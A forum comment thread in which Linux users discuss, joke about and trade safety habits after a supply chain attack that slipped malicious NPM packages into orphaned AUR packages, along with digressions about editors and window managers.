You must log in or register to comment.
Also, an ad blocker.
With the old package managers safety was simple…trust the developers, user their packages. 10000 downloads? Easy! 1 download… 🤔 Maybe skip for now.
Now with executables like mac and Windows it’s easier to sneak something in. You still rely on trust. But now you’ve got AI in the game mudding the waters.
So… rkhunter?
I don’t use Arch, BTW. So the biggest NPM threat vector on my machine is still VSCode.
I’m trying out Zed
I was anti GUI for years. Having learnt to program on a tiny green and black 40x24 CRT on my old MSX back in the 80s. I remember being made fun of by fellow students and co workers alike for doing almost everything in the terminal. This included huge projects with complex file trees and lots of files.
But as time went on, I started to appreciate the GUI more and more. And these days I’m all for using a GUI for a lot of things.
Especially in IDEs that can do a lot of things with short keyboard shortcuts. I now have multiple monitors, including a large 32" primary. I always have stacks upon stacks of windows open and manage them efficiently. There’s always at least a couple of terminals hanging out and of course most IDEs also have terminal windows baked in. But all of the extra visual tools help me out a lot.
Almost the exact opposite for me. Used to hog GUIs and hated keyboard shortcuts with a passion, but then I came across Niri, fell in love with the idea, and the whole scrolling window manager thing made my productivity explode. I can’t use traditional desktop environments anymore. Tried to go back and literally can’t.
Tmux wasn’t that far behind.
I’m a longtime vim user and I use nvim+lazyvim for all my personal stuff these days, but I have to use enterprise managed VS or VSCode for work.
Microslop is nervous now that Linux is popular enough to attack.
Linux has always been the bigger target. Even microslop uses linux for its severs.
I’m gonna assume that their servers are not installing stuff from AUR though
I would hope so too
Linux Users: haha those silly windows users, always searching the web for their software and getting viruses.
Linux Users: oh no I got malware by searching the AUR!Don’t worry, I found a package on npm to help!
The AUR is still safer. One, it is at least minimally moderated. If a malicious package is detected, it can be reported and removed. Two, the installer is usually not just a black box executable. Three, most of the build and runtime dependencies are from the official Arch repos, which provides some protection against supply chain attacks. For Windows installers, you have to trust the distributor to bundle clean DLLs (for that matter, the same applies to AppImages).
But if it starts downloading anything from NPM… ^C and run.
The most unsafe factor of the AUR is aur helpers and their goal to dumb everything down and streamline the process as if the AUR where an official repo
I’m not entirely sure I agree, I think the issue is with default settings.
Like you could use both yay and paru to diff the PKGBUILD of the most recent updat and then read it, and then approve each. And I think that’s pretty helpful. But you could also just blindly accept the update with the right config or flag and that is not a good practice.
Ye my reaction to this was basically uninstalling yay to force me to do it manually
appimages are kinda like portable app versions.
By misusing the AUR and ignoring every warning telling you to read and understand the pkgbuild or don’t do it.
Everyone knows if you use Kali you’re immune to malware
btw, I use malware
Never trust an NPM library
bu-but so many libraries need funding!
Fuck node
Me!!!
But I’m actually safe: Last month I fried half of my BTRFS array, and decided that instead of recovering the system, I’d rather copy over the relevant data and reinstall Arch from scratch. In doing so, I’ve shed the majority of AUR packages that my old system had. Of the handful of AUR packages on my new system, none were attacked.
I avoid
orphanedunmaintained packages and I wait a few days before I typeyayThey also wait until they get off the rollercoaster and back on solid ground before yelling
yay!Is there a flag to prevent orphaned packages from installing?
Good question, I guess I might be using the wrong word when i say “orphan” because I see the arch wiki uses that term differently
Orphans are packages that were installed as a dependency and are no longer required by any package.
You can remove these manually or if using an aur helper like yay there are flags/settings you can use to delete them after the desired package was installed.
However what I was talking about aur packages that are unmaintained or do not have a maintainer anymore.
I’m researching more at the moment.
shit, I had 150 orphaned packages
pacman -Qdtq | pacman -Rns -I made an alias for this, but IMO this cleanup should be automatic. The user didn’t install it themselves after all.
This can be prevented by uninstalling with -Rs
Just removing them without user intervention could cause unexpected behavior.
You’re no fun
Waiting for updating doesn’t make any difference. The packages could be infected at any point.
The packages could be infected at any point.
I guess the same could be said for literally any open source or freely distributed project.
The difference is that this was a supply chain attack and, to my knowledge, required the package to be listed as
orphanedunmaintained first so that the PKGBUILD could be modified to install malicious NPM packages.The community caught it quickly because it is possible to read both the PKGBUILD and the output of the update and, I think, it is fully resolved as of now.
Basically, if one were to delete or replace orphaned packages then they wouldn’t have been infected.
It is also possible to add a CVE scanner for AUR packages if reading the PKGBUILD is too much, I’m looking into how to do that now.
All this is to say that you should check if you had an infected package but I personally don’t think using the aur is more risky than using a flatpak.
Waiting for updating doesn’t make any difference.
Are linux users allowed to juat lie like that? I thought if you do that you need to use Windows.
What?
C’mon, man, at least pour one out for the homies who waited to update and landed in the period where it was live and undisclosed.
Inverted security by obscurity
Obscurity by security?
Sescurity by Obcurity
Obituary by Sorcery
ive been looking for an antivirus since i want to be able to download random stuff from the internet without having to review it
Clamav is pretty good if all you’re wanting to do is scan the files you’ve downloaded so that you’re not potentially re-transmitting viruses.
Outside of that, maybe consider using SELinux for security, or possibly if you’re going to be doing risky downloads, do it on a virtual machine, on a virtual network.
Doesn’t work like this.
